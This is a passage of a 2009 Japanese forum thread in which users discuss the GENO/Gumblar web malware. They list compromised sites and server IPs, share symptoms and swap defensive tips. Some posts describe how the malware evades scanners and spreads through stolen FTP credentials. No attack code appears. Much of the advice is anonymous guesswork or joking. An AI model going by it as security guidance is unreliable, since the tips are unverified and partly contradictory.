あと、ニフティのオンラインスキャンで大丈夫なら感染してないって判断で良いのかな？

現状だと、セキュリティーソフト入れていても、次々と新種が出てきて対応できない
感じ？

どこのサイトで感染するか分からないという恐ろしい事態だな
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

http://www3.atword.jp/gnome/

こちらを見るとすごおおおおおおおくまずそうなのですが
この予感は当たっていますか？

ＮＴＴが感染しているなんて、信じられないのですが

>>736

その通り
こいつは狙いやすい環境(IE)をチェックして感染しているのがたちが悪い

>>736
んな感じ
とりあえず既にいろいろ言われてる対策はしておいたほうがいいとはおもう

>>737
そこはむしろ見ておいたほうが良いと思う。
心配ならまとめページのトップからもリンク張られてるし確認するといい

Adobe Readerってアンインストールしてもいいんですか？

>>740

使わないんならいいんじゃね？

不便だけどさｗ

>>741
このウィルス知ってから何もかも恐る恐るって感じなんですよ･･･
とりあえず滅多に使わないんで消しときました
レスありがとうございます

ウイルスバスター終わったので寝ます orz

明日みんなに連絡しなくちゃ…

みなさんもお気を付けて

>>717
7年ぐらい前かNimdaの騒ぎは凄かったな。
NHKの7時のニュースでもトップ扱いだったかな。

てかニフティで検索するのに
ニフティ感染してるの？？？？

>>745
（ ﾟДﾟ）

何だと・・・？

>>737
もう一体何が起こってるのかさっぱりなんだが・・・

大塚製薬とSayMoveのほかにＮＴＴまで感染してんの？？

>>746
前のﾚｽにも出てるけど
http://www3.atword.jp/gnome/
のｻｲﾄにかいてある

SAKURAインターネットさん
　www1722.sakura.ne.jp
　sv172.lolipop.jp
　sv11.chicappa.jp

株式会社 PURENIC JAPAN さん
　p09ns7.puretopure.jp
　
NTTコミュニケーションズさん
　120.29.185.234(VPS-TOKYO2)

ニフティサーブ ネットワーク(ニフティ株式会社さん
　61.121.100.119

の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・

>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz

早く寝てしまいたい…

ニフティにアクセスしたらアウトなの？

ニフティのセキュリティ情報サイトさっき見たばかりなんｄ

マジでヤバイなこれｗ

ニフティ今朝アクセスしたばっかり・・・。うｗぁああああああああああああああ

けどコマンドプロンプトもレジストリエディタも普通に立ち上がったぞ
IEの挙動もなんともない
CPU使用率もいたって普通

>>196
これって何をスキャンしたの？
ローカルに保存したファイルしかスキャンできないと思っていたんだけど、違うのか？

一気に感染拡大してるじゃん。しばらく安心してネット出来ないなこりゃ

ニフティマジかよスキャンするためにわざわざIEでJS有効にしたのに・・・

専ﾌﾞﾗで2ｃｈ見るぶんには大丈夫だよね？

avast反応よさそうなのでインスコしたらBeckyでメール受信出来なくなった
アンインスコした

>>754
IEの挙動は元々おかしい（ＷｉｎＭｅなので・・・）んだけど、
ＭＳ−ＤＯＳプロンプトとレジストリエディタは立ち上がった

一応、感染してないってことで良いのかな？

これて桜とかニフティでサーバーかりてる一部の感染じゃないの？

>>754
ＣＰＵ使用率は元から100％な件・・・

ニフティなんてスキャンするために何度も行ってるが

もう疑心暗鬼になってるなｗ
よくあるパターンだｗ

怖くて再起動/シャットダウンできないｗｗｗ
寝たいよー

ウインドウズアップデートしたら重すぎて怖い

>>765
休止はダメなのか

どうせサイトなんか持ってないし、挙動もおかしくないし、
（感染してるかどうかわかんないけど）騒動落ち着いてからOS入れなおそうかなｗ
何かもうアホらしくなってきたｗ

www.nifty.comとはIPアドレスが違うから落ち着け

あやしいURLを開こうとしたらウィルス対策ソフトって警告とか出ますかね

>>765
俺もシャットダウン＆再起動できんわｗ
シャットダウンしたら最後、起動できなくなりそうでｗ

バックアップも取ってないし、終わったわ・・・
アダルトサイト見ていたわけでもないのに、何でウイルスに出くわすんだよ

>>770
俺はavastでページ開く前に警告出たんだけど、何故かウイルスチェストに移動できなくて
果たして感染防止できたのか、感染してしまったのか判断できずに困ってる・・・

>>772
挙動がおかしくなければ多分大丈夫

よっしゃ、勇気を出して（ヤケクソで）再起動したけど
またここに戻ってこれたよおおおおおお

>>769ありがとねｗ

>>772
まずはすぐに確認できるもの(regeditとか)だけ確認してみれば？

>>771
案外アダルトサイトの方がウイルス対策や改竄対策をしっかりやっていて却って安心だったりして。

これって感染したらすぐわかるもんなの？コマンドプロンプトやレジストリエディタなんて、普段はあんまり使わないし
特定のサイトに繋がらない、ブラウザが落ちるっていうのも何も知らない人だったら「ちょっと調子悪いなぁ」くらいにしか思わないんじゃ・・・。

これだけ広まってれば大々的な対策されるのも時間の問題だよな、流石に
そうであってほしい

>>773
Ｍｅのせいか、普段から挙動がおかしいので分からんｗ
>>775
とりあえず、ＭＳ−ＤＯＳプロンプトとregeditは起動できた
大丈夫なのかな？
>>776
それは言えてるｗ
意外とアダルトサイトってウイルスいないよねｗ

>>760
Meってとっくにセキュリティー関連の更新が終わっているんじゃないの？
脆弱性の検査もされずに放置され、トロイとかの餌食になってると思うけど。
持っていないから、詳しくは知らんけど。

Meは今んとこ感染報告ないからのう…

>>780
２，３年前にサービス停止したね
でも、俺のＰＣはＭｅがＯＳなので、仕方が無く使ってるわ・・・
一応、Ｍｅでもavast入れていれば大丈夫だよね？
今回も警告出てくれたし

GENOはどこからウィルスもらってきたわけ

>>782
いや例えこのウイルスはブロックできてもそれ以外で問題山積みだから
窓から投げ捨てて安物のネットブックでも買って来い

>>784
今日、電気屋に行って、ＰＣ物色して来たよ
ＯＳ（ＸＰ）がインストール済みのノートで５万５千くらいだったな

Ｍｅは古すぎる、つまりネット絡みが貧弱なので
落とされる脆弱性はあっても乗っ取られる要素は2000よりも少ないと何かで読んだことがある。
98ＳＥからXPに移行したクチなのでMeは良く分からないな。

安いPCを探そうと思ったけど通販サイトや情報サイト覗くのが怖い件ｗ

>>782
古いOS　脆弱性
でぐぐったら、トップにこれが出てきた。
熟読した方がいいと思う。
http://blog.hitachi-system.co.jp/01/316.html

詳しくは知らないけど、MEを使ってるのは、AdobeReaderの9.10以前を使っているよりも危険だと思う。
avastがウィルスの侵入を食い止めてくれても、脆弱性をついた攻撃をガードできるわけじゃないはず。
そもそも、セキュリティーメーカー側からしたら、時系列が逆だし。

Windowsが狙われたとは言えmacを使う気になれないのはどうしてだろう。

このウィルスの話題って外じゃ全然でてこないけど
かなりやばくないか

2ｃｈ内でもそこまで騒ぎになってないよな
苺きんたまの時とかの方がみんな騒いでた
セキュリティソフトを過信して安心しきってるってことかな

>>790
大きい企業もやられているので圧力が・・・
個人情報も抜かれてるなんて知られた日には初心者はパニックになるよな。

4月の半ばになんかのサイト見ようとリンク押したら警告でたなぁ
もしかしたらこのウィルスかもしれん

アドビのサイト開こうとするとブラウザが固まる
FireFoxならいけたんだけど何でだ

小林製薬のサイトよく見てたから怖くなってきた…

61.121.100.119って
hXXp://homepage.nifty.com/
のサーバーのIPアドレスか？

なるほどwww.nifty.com行っても反応ないのか

見に行ったら表示されないなあ

再起動したけど、とりあえず普通に立ち上がったわ
CPU使用率も問題ないし、regeditも起動できた

感染してないってことでOK？

Nimdaは感染経路がいくつもあったからある意味「責任逃れ」ができたんだけど、
GENOウイルスはサイト管理者のPCが感染→そこからFTPを通してサイトが改ざん→
そのサイトにアクセスすることで感染、と経路（つまり責任）がはっきりしているから
「お前のせいで感染したんだ！どうしてくれる！」「怖いからもうそこでは買わない、
それどころかそのサイトに行きたくもない」と企業や個人の責任問題にされかねない

aguse.jpが全然役に立たない理由が↓見てわかったわ。
http://ilion.blog47.fc2.com/blog-entry-128.html

jscript.dllのバージョンを調べて、本当にIEで表示してるのかを確認してるから、
UAを偽装してアクセスしても検出されないんだ。
スクリプトの難読化パターンも多いし、シグネチャベースの検知はかなり難しいね。
オンラインスキャンもほとんど無意味だし、avast入れておくのがいちばんかも。
とりあえずIEを使わないってだけでも、現時点では効果があるけど、改変版でも
大丈夫かどうかわからないし。

ノートン無反応か・・・早く対応すればいいのに

2009/5/14 22:39 - 小林製薬 (4967) は12日、同社のホームページが何者かによって改ざんされ、
ホームページにアクセスするとウィルスに感染するようになっていたとして、
ウィルス感染が判明したホームページを当面の間、閉鎖したことを発表した。
　同社によると感染が明らかになったホームページは
「暮らしのヒントお知らせ隊（http://hint.kobayashi.co.jp/）」「ハナノアブランドサイト（http://hint.kobayashi.co.jp/hananoa/）」
「イージーファイバーブランドサイト（http://hint.kobayashi.co.jp/easyfiber/） 」の3つ。
　それぞれ、5月9日5時27分から5月11日21日27分までこれらのホームページにアクセスした人は、
ウィルスに感染した可能性があるとして、感染の有無を確認するように呼びかけている。
　ウィルスに感染した場合、sqlsodbc.chmの改変、コマンドプロンプトが起動不能、レジストリエディタが起動不能などの症状が発生するとしている。
　尚、同社ではMacとWindows Vistaに関してはこのウィルスには感染する恐れはないとも述べている。
ttp://www.technobahn.com/cgi-bin/news/read2?f=200905142239

>同社のホームページが何者かによって改ざんされ

aguseは、GENO祭りの真っ最中もまったく役立たずだったな。
何度調べさせてもセフセフ。

GDATA(avast)は対応済みか、、、後常にJSを切ってる人

↑見たらJSあっても無くても感染するのか。

ﾌﾗｯｼｭﾌﾟﾚｲﾖー10って小数点以下の違いある？
ｱﾄﾞﾋﾞﾘｰﾀﾞｰ9.10と9.11みたいな違い。

違いがないのに数だけ増やしてると思ってるの？

>>805
zlkonやgumblarがアクセス制御かけて同じホストからの接続には
しばらく(?)無害になるのでサーバーサイドのチェッカの類はほぼ効かない
(初回は有害判定されるかもしれんけど、たぶんJScript.dllチェックで蹴られておしまい)。
NortonSafeWebもセーフ判定のまま。

>>803
確認して感染が見つかったらどう責任とってくれるんだよｗｗｗ

>>803
＞同社のホームページが何者かによって改ざんされ

ｗ

GENOにくらべたら対応がいいほう

アンチウィルスのパターンファイルもアテにならないし、ヒューリスティック頼みだな。
そのヒューリスティックもAvast!以外は無力みたいだし、Avast!も亜種すべてに
反応するかわからんし、困ったもんだな。
JavaScriptの埋め込みによるリダイレクトじゃなくて、hrefタグを書き換えるような
形になってしまったらAvast!も反応しないんじゃないかな？

>>809
そうじゃなくて10にも種類があるのか知りたい。
前に10にしたけど知らない間に新しいの出てると困る。

>>815
FLASH バージョン　でググって最新版か確認汁

>>815
Acrobat ReaderなりAcrobatなりを立ち上げて、ヘルプメニューの「アップデートの有無をチェック」
してみればいいよ。インストールされているAdobe製品全般のアップデート確認が行われるから。

>>809の突っ込み方はないわなｗ

>>817
それ、なぜかFlashは対象になってない気がする。Reader、Acrobat、PhotoShop等は
アップデートされるんだけどね。

まぁFlashPlayerはそれ単体で起動するものではなくブラウザから呼ばれる物だからね。
IEならFlash置いてあるサイト管理者がobjectタグにバージョン書いとけばそれ以下ならIEに更新を促される。

何が目的かわからんが、現在の最新版と今自分が使ってる版を確認したければここを開け
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

>>819
Flashはここで見れるよ

>>814
やっぱ、avastって凄いのか？

貼り忘れた　org

ttp://www.adobe.com/jp/software/flash/about/

orz 　(^^;

有料のノートンとかバスターより無料のavastが凄いとか、どういうことよ？

JAVAスクリプトのソースに、ノートンのオートプロテクトは反応しないのか

>>823
Genoに関してはね。
過剰に反応することも多いし、FWやアンチスパイウェアとも組み合わせなければ
いけないから、PCにあまり詳しくない人には勧めにくいんだよな。
家族が使ってるPCのセキュリティソフト、どうすっかな。

バスターは元々無料のより使えないけどな

>>827
しないね。難読化パターンがいろいろあるし。

このウイルスの怖さを周りや上司にいっても
「ふーん」で終わって、ちゃんとupdateの確認さえしたかも怪しい。。

これが普通なのかな、ちゃんと説明した自分が空しい。。

>>828
俺、avast単独で使ってるんだけどダメなのか？

俺のところも、前回のラトビアの規制だけして、adobeのバージョンアップはなし。
業務に影響を及ぼしうるadobeのバージョンアップは許可できないんだそうでｗ
業務用バスターｗ入れてるから大丈夫とか、もうアボガドバナナと。

>>815
http://www.adobe.com/support/security/#flashplayer
日本のサイトはアップデートが遅い。
最新じゃないのに、最新といってくる。


>>832
FWは入れたほうがいいのでは？


コマンドプロンプトやレジストリ起動不可能っていう情報も、ミスリードさせるSE攻撃かもな。

>>832
FWはルータの内側で使ってるならなくてもいいかもね。
Avast!単体だとマルウェアやスパイウェアの類はスルーされる可能性があるから
入れておいた方がいいと思う。

Avast+UAC+WindowsFWが手軽でわりと安全

>>835
ルータ（ホームゲートウェイ）の内側で使用してるわ

FW（ファイアウォール）って、ルータとかで外部のインターネットと
隔絶されている環境（LANとか）ならもう入っているんでしょ？

>>837
ルータにはポート、プロトコルベースのFW機能はあるけど、自分で設定しなければ
ザルだよ。標準状態ではTeredoが通過しちゃうものも多いし。

本物のウィルスより怖いわ
バックアップとっておくかな

ＩＤがでないから、誰が何を書いているのか分からんな。

>>837
使っているOSは？

ルーターが仮に100パーセント外部からの攻撃は防げたとしても、
内側からのリクエストはスルーするからね。
ブラウザでリンク先をクリックすれば、
ルータに遮断されずに次のページの（外部）情報がローカルに戻ってくるのと同じ方法で
悪さをされないともいえない。

PCに入ったマルウェアが外部に情報を送ったりってのを防げる確立が減る。
ＦＷ入れてても、ＩＥとかに偽装されて通信されるんだから、入れたほうが良いよ。

フリー　HIPS Firewall OR ファイアーウォール
でググルんだ。

>>840
OSはWinMe
FWってルーターの内側でも別個に入れておかないとダメなもんなの？
俺はavast入れておいたから、もう大丈夫だと思ってたよ
セキュリティソフトってファイアウォールの役割もあるんじゃないの？

Meなんか捨てろ

>>842
２００４年に中古ＰＣを買ったとき、プリインストールされていたんだよ
まだ５年しか使ってないんだぞ？ネットゲームとかしない限りは、普通に
ブラウザでＨＰも閲覧できるし・・・特に問題はないんだが

たった、５年で捨てるとか、買い換えるとか、車とかＴＶ，冷蔵庫じゃありえん

知り合いは言っても無駄だから全部人柱、観察対象でｵｹ。

>>614-615
ありがとう、調べてみる

>>841

>FWってルーターの内側でも別個に入れておかないとダメなもんなの？
だから、入れておかないとダメって言ってるじゃん。

>>779と同じ人？
はっきり言って、君のような人がボットネットやマルウェア拡散の踏み台になっているんだよ。
>>779-788
は読んだ？

avastはFW入ってないでしょ？
ウィルス対策とファイアーウォールは別。
ノートンとかウィルスバスターはＦＷも統合されているけど、ウィルス対策だけを抜き出している製品もある。
avastは抜き出された方と同種であり、セキュリティーの一部を担っているだけ。

ルーターも初期設定で使ってそうだな。　ルーターだと思っていたが、実はモデムだったってオチすらありそうだ。

何か色々あったが3日で直った、多分このウイルスの現象
１、とりあえずＩＥが満足に使用できなくなる
ＩＥの再インストール？上書き？でとりあえず直る
２、公式ログイン制のオンラインゲームが起動しなくなる
どうやらパスワードの認識が通らなくなる様子、何故通らなくなるのかは知らん
avastのアップデートが出来なかったり、エアーステーションに接続できなくなったり等
３、ｃｍｄが使えなくなる、色々方法を探してたときに気づいた
結局cmdは使ってないけどな、復元ポイント早速作っておいたわ

とりあえずスパイウェア削除してavast起動したらシステムメモリ内にウイルス混入してたっぽく
再起動後にスキャンするとか言うのをやったら直ったっぽい

>>846
ルーターであることは確かだよ
光回線だし、モデムだけじゃなくてホームゲートウェイで
インターネットに接続しているから

ただ、初期設定の状態で使っていることは確かだな
ルーターの設定を勝手に弄って、変な設定に変えたらまずいし

とりあえず、もう少ししたらＸＰのインストールされたＰＣに買い換えようと考えている

>>848
7にしておこうよ？

>>847
何でその時点の復元ポイント作るんだよｗｗｗ
悪いことは言わんからＯＳ再インストールしてメール等、思いつくもののパスワード全部変更しとけ。

そうそう、何かの雑誌で「セキュリティソフトは１個だけインストールするのが基本で
複数のソフトを入れると競合が起きてまずい」って書いてあったんだよ
だから、俺はavast一本にして、他のＦＷとかも一切入れなかったんだ

avastはFW入ってないから競合しようがないと思うが、することあるん？

ＦＷもセキュリティソフトの一種だから、競合起こしたらまずいと思っていたんだが・・・

>>851
それはノートンとかの話でしょ？

それにお前はavastにFWが搭載されていると思っていたんだろうが。


>>849
一刻を争う時に半年後の話をしてどうする。

>>852
対策されてるかわからんが、一昔前はある事もあったよ。
ＦＷ単体のほかにウイルススキャンのソフトもやってる会社だったから、他社製品に対して意図的に競合起こしてんじゃねえの？
って言われたりしてた。

もう1回ニフ見てくるか

>>843
中古で買った日から起算して5年とかバカなの?
MEはその名のとおり2000年、前世紀(20世紀)の遺物で
2004年当時はXPに対してSP2が出ている。

おまけに10年前だろうと去年だろうと車やVTや冷蔵庫の性能は大して変わらんが
PCの能力やそれを取り巻く環境(ネット等のインフラ、その利便性と脅威)は
大幅に変わるんだよ。XPSP2もBlasterやSasserの猛威があって
日本中の郵便局でCDを配っただろ。
MEは現時点であらゆるサポートが切られている。

>>855
そうなんだ、�d

XP使ってるんだがカスペオンスキャンで感染見つからなければセーフ？

Meが何の略かとかさっぱり忘れてたぜ

つーかよく9x系未だ使ってられるよな。
システムリソース気にしながら作業なんて
もう考えたくねえ

>>854
> >>849
> 一刻を争う時に半年後の話をしてどうする。

だってこれからXP買おうとしてる人にVISTA勧めるのもなぁ

ニフもGENOも問題なくなってるのか
馬は警報きた

夏過ぎに７にアップグレードできるＶＩＳＴＡ搭載機は出るとは思うが、
この馬鹿は懲りずに中古買いそうだ。

>>843
>たった、５年で捨てるとか、買い換えるとか、車とかＴＶ，冷蔵庫じゃありえん

Windows Meは車検切れ。
製造のMicrosoftしか車検はできず
そのMicrosoftがWindows Meはもう車検しませんと言っている。

>>747
大塚製薬に謝れ!!

まあPCは特殊分野だからねえ
F1マシンに例えると今期のマシンが最高速度300km/hだったのが来期は600km/h
その翌年には1200km/hになってるようなもの
ちょっとおかしな世界なのよマジで

>>863
馬て何？

>>748
NTTだけ反応するなあ

この程度ならVista UACを使うまでもなく、ルーター＋Win2k+で問題ないでしょ。

>>868
トロイ奴だなｗ

>>871
あ、なるほどｗ

>>843
世界が違うんだよ。家電と。解らないならパソコン辞めろ

>>870
そうだな
Vistaは誰でも簡単にセキュリティが保てるようにしただけの物だから上級者なら2000でも十分だな
ただ2000のアップデートももうじき終わるのが痛いな

>>847

おいおいｗ

ある日莫大な請求がいってもしらんぞ

ＸＰのサポートっていつまで続くの？

2014年まで

Windows2000やXPでセキュリティを保つよりVista以上のOSに
ルータ、アンチウイルス、PFWなどを入れて各種の最新のパッチ入れたほうが楽だろな
俺はWindows7に期待している

スレの伸び方が怖いお。

ノートンとかが対応しないのは横柄？
それとも、まだ全然脅威でない、ってな見解？

VISTAはユーザーにつかいにくいとフルボッコ状態だったけど
ウイルスからフルボッコされないって皮肉なもんだね

まあ、それだけシェアが少なくて相手にすらされてない現状なんじゃね？
シェアがVISTA系のみならUAC回避の方向で作られただろうしさ。

>>880
Macと同じだろ。
不人気だからウィルス作者にも相手にされない。
もしVistaのシェアが激増すれば攻撃されまくるだろうけどね。
Vistaは表面上、セキュリティ厳重に見えちゃうから、
もし攻撃対象になったら素人どもが阿鼻叫喚だと思う。

XP Pro SP2 Firefox3.0.10 です

WindowsUpdate
PDFリーダーを最新にする
AdobeFlashを最新にする
ウイルスバスター2008
NoScript
これだけじゃ防げないの？

OSは最新を使っていればセキュリティはまちがいないな

>>883

当面はだいじょうぶだろうけど油断禁物

>>883
OSに関してはMicrosoftUpdateのほうでおねがいします
なんでSP2なのかわからんけどSP3を当ててね

>>883
とりあえず今のところは防げるんじゃないの
しかし、優秀なGENOウイルスメンバーは、
セキュリティの盲点を新たに突いてやってくるから恐いんだよ

>>859
それだけじゃセーフとはいえない
>>879
横柄とかそんなアホな問題じゃなくて
中身が変わりすぎて対応しきれないだけ

>>885-887
ありがとう、油断はできないんだねｗ

>OSに関してはMicrosoftUpdate
WindowsUpdateとなんか違うんですか？

>なんでSP2なのかわからんけど
SP3入れて不具合っての良く見かけたもんで躊躇してますｗ

ｗ

ttp://www3.atword.jp/gnome/2000/01/13/block-list/
↑サイトを見てルータでIPフィルタリングしたいんだけど、送信／受信両方とも登録しなきゃだめかな

>>889
ＳＰ３に関して、今はあら捜しが好きな奴が大々的に言ってるだけ。
まあ、ＳＰ２出たばっかりの頃を経験してるから、アップデート躊躇する気持ちもわかるけどね。

PayPalのお金がなくなってた！

こいつのせい！？

>>891
送信だけでいいと思うよ

>>893
俺も戸棚に置いといた茶菓子が無くなってた！

こいつのせいに違いない！

>>891
某メーカーのルータはフィルタリングしても効いてないやつあるから注意な

メインはfirefoxでIEはめったに使わないんだけど
IE6のままだと心配？7か8にしたほうがいいのかな？

>>895
おい！
さっきまで腹減ってたのになんだか腹一杯になってるぞ！
お前のせいか！

>>897

IEは他のウイルスにも狙われてるから危険

>>897
せめて7にしとけばいいんでない？
8は入れたけど7に戻したわ。

>>899
>>897はupdateとかでたまに使う程度だと思う

>>900
やっぱりIE6じゃまずいか･･･7入れてみるよ

updateとかでたまに使う程度だけど

>>901
firefoxにieのプラグインを入れたらいい

もし個人HPとか作成していたらそれもやばいのか

>>903
そりゃヤバイだろ

>>902
結局それieエンジンになるから同じことじゃね？

大手企業さえああいうことになってる訳だし〜

ちょっとまてよ…
firefoxにieのレタリングをアドオンをすれば
限りなくieの脆弱性をもつfirefoxになるのか？どうだろ

>>902
アホや、アホがおる

アドオン入れてたかもしれん
削除しとこー

>>902
それが一番危ないんだよｗｗｗ

IEかどうかを調べているから純正IEよりはマシじゃね

>>908
スマンorz

本プラグインの現バージョンでは、IEエンジン使用時にSSLを使用したサイトを鍵マークなどで
区別する手段が用意されておらず、IEエンジンのまま普段訪問しないサイトを利用するのは
セキュリティ上の不安がある。
そのため現状では、“Gecko”エンジンを主に使い、よく利用するが「Firefox」などに対応していない
サイトを利用する際にIEエンジンに切り替える、といった使い方にとどめておくことをお勧めする。

ttp://www.forest.impress.co.jp/article/2006/01/16/ietab.html

>>907
なりません

もうね危ないからネットのケーブルはずしちゃお。
これで気兼ね無くネットができ……アレ?　

深刻なはずなのに、たまに和むレスがあるなｗｗｗ

http://dxd8.com/archives/192/

ホームページ制作会社が感染というは危険がありますか？

発注先の会社が感染しているか確認する方法はありませんか？

ソースみりゃ

>>917

ｗｗｗ

あるわけないだろｗ

直接聞いてみたら？

>>917

まじかよ。

危険もなにもやばすぎるだろ…。

ウイルス入りのページばらまかれたらたまらないな。

制作会社のソースを確認したほうがいいぞ。

ありがぞうございます

ソースというのはどこで見ればいいのでしょうか？

>>921

冷蔵庫に入ってるんじゃね

>>889
SP2へのアップデート時にはかなりの変更があったのでトラブルが続出したけど
SP3は基本的にセキュリティ修正なのでだいたい問題ないはず

WindowsUpdateはOSのみ。MicrosoftUpdateはOS、Office他。
Office入ってなくてもWindowsUpdateじゃ更新されないものがあるんで
こちらを推奨だそうです。
http://www.microsoft.com/japan/technet/prodtechnol/microsoftupdate/default.mspx

ｗｗｗ

マジレスすると今すぐ電話して聞け

JAVA切っちゃってみんな絶対動画サイト見ないの？
俺は我慢できんからつべとニコ許可しちまった

>>925
JavaじゃなくてJavaScriptのほうね

>>923
ありがとう、Office入ってないけど考えてみます

ここにどう動作してるのか詳細に説明してあるな。
ttp://ilion.blog47.fc2.com/blog-entry-128.html

このタイプはVISTA系以外でIE系なのか調べて該当したら、
Adobeの脆弱性を利用して感染している様だ。

次はどんな亜種が出てくるのやら

制作会社感染はまずすぎますね


定期age
はじめてきた人はここで確認してください

http://www3.atword.jp/gnome/

>>925
同じくｗ

加えてyahooとgoogleも許可してるけどまずいのか？

JavaScriptは切ってないな
リーダーの方をアンインストした
又インストすれば良いし

感染するとどんな挙動になるんです？

>>928

IEだとめちゃ危険じゃん…。

>>932

ある日突然パスワードが盗まれます

もうやだ…検索するのさえ怖い

ttp://www3.atword.jp/gnome/2000/01/13/block-list/
ここのListをPG2や葱用にBlock.txt作ったけど要る？

類をみない凶悪さだ思うんだが、思ったより騒がれていないな。

もっと取り上げられてもいいはず。

IE系で無自覚で感染しているやつが多そうで怖いよ。

>>936

くらはい

大体解決したね
もう次スレいらないね

久しぶりに見たわそれ

次スレそろそろ立てるシーズンだけど
テンプレ考えようか

>>937
大きくニュースで取り上げられたら普通の人も怖さに気付く

パスワード盗まれるだけで
ＰＣに挙動がおかしくなったりしないの？
ＰＣ異常きたさずにパスだけ抜かれるなら
怖いな

解決してねーだろｗ

ここのやつらは解決してるだろうが。

>>928
IEじゃなくても危険ということか…

>>945

どこをどう読んだらそうなる？
IE系がターゲットにされてるんだよ

IE以外も油断はできない早さで進化してるけどな

挙動おかしくなるて書いてたよ

>>946
928を書いた人か？

もうイヤだ。
こんなインターネッツ。

>>948

違うよｗ

再起動でけた
小林製薬のHP見たことあるからびびってたんですよ

ふっつーにOperaでも感染しそうになったよ
Adobe ReaderのJavaScriptを切っていたから助かったみたいだけど
もちろんUA偽装なんかしてないぞ

>>943
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

これ天婦羅に揚げた方がいいんじゃないか？

また新種きてるってこと？

そろそろ次スレ準備お願いします。

>>941
感染を疑った人の報告をテンプレで統一化するのは？

【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

こんな感じにすれば診断する側も
見やすい気がするお

【解決】GENOウイルススレ 4【してません】

>>953
これとあテンプレ候補よろ〜

立ててくるから

とりあえずそんなもんかな？

よろしくー。

一般人が騒ぎ出す頃が一番やばそうだね。

>>938
ttp://www.rupan.net/uploader/download/1242362767.txt

テンプレとしてこれに追加で良いかな

感染が疑わしい人は迷わずクリーンインストール推奨です。

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★過去スレ
GENOウイルススレ　★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/

GENOウイルススレ　★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

>>5　のサイトもいれてほしい

>>959

ありがと

これも追加してもらってもいいかな？

製薬会社のメールマガジン登録してるんだけど
これも開いたら危ないのかな…

とりあえず残りのレスはテンプレに入れてほしいものを書き出そう

>>5
>>19

次スレです。
追加のテンプレを考えてください。
随時追加します。

GENOウイルススレ　★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/

おつー

>>19 もたのんます

まず最新バージョンにする
Adobe Flash Player 10.0.22.87
Adobe Reader 9.1.1（5/12アップデート）

AdobeReader設定で、
「PDFをブラウザに表示」「Adobe Javascripを使用」
っていうところのチェックボックスを外す
ほとんどのAdobeReaderプラグインの脆弱性を狙ったウイルスにやられなくなる

--
これはいれたほうがいいかな？

　・IEを使用しない
　・FirefoxならNoScriptを入れる

これも最初に入れてくれ

テンプレに、So-netの記事と小林製薬他の「まともな告知をしている所」のリンク張っといたら？
説明するのに楽だろ。

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

【OS】 Windows Me
【使用セキュリティソフト】 avast! 4.8 Home Edition
【疑った理由】　106hotline.com/guidance/kiso_syougou.html にアクセスしようとしたら、avastが反応したため
【症状】 avastが反応し、警告音と共に「JS:Redirector-H2（トロイの木馬）を検出した」と表示されたので、
　　　　驚いてすぐにIEを閉じたが、「ウイルスチェスト」への移動が「エラー」となり、感染したか未然防止できたか不明
【確認手段】 「TemporaryInternetFiles」の中身を全部削除した後、avastで全ドライブをチェック後、再起動
【結果】 ウイルスの検出無し、再起動は正常、CPU使用率も正常、MS-DOSプロンプト、regedit起動可能

１．Adobe Flash Player のアップデート
２．Adobe Acrobat Reader のアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript OFF
５．危険IPのブロック

ネットがリアルに浸入してきたんだ！

>>XP / 2000 の方は sqlsodbc.chm をチェックしてください。

この sqlsodbc.chm ってVISTAにもあるがスルーでいいのか？

格納されてる場所は違うけども

テンプレ完成したらまとめwikiに貼っておこうよ
次スレまでに状況変わるにしても叩き台にはなるし

>>972
お前はもう黙ってろｗ

おつー
ひととりＯＫかな？

Meの人はあきらめてくださいｗ

一応大体のものは貼ってきた
被った人すみません。>>966

まとめサイト>>129

>>970
これで良いかな？

http://pc11.2ch.net/test/read.cgi/sec/1242363241/12

＞＞199関連も必要なのかな

>>980
すまん入れていなかったので今テンプレ続きにした

プリフェッチ機能を無効　
でググったらＩＥもできるみたいだけど、やったほうがいいんかね

落ち着いたみたいなので質問

感染した場合、ワクチンやM$のパッチじゃ回復できないの？

>>985
感染してたら、今のところ
クリーンインストール&各種PASS変更　推奨

>>986

ありがとう
やっぱりそうか…やばいね

gumblar.cn の検索結果 約 84,200 件中 1 - 10 件目 (0.10 秒)

>>968
javaは見つかったが
「PDFをブラウザに表示｣の項目がどこかわからない

>>989
確かインターネットの下。
俺はreaderいれてないから確認できないすまん

>>986
感染しているかどうかは、どうやって判定すれば良いの？

環境設定→インターネット→Webブラウザオプション

>>991
http://pc11.2ch.net/test/read.cgi/sec/1242363241/12

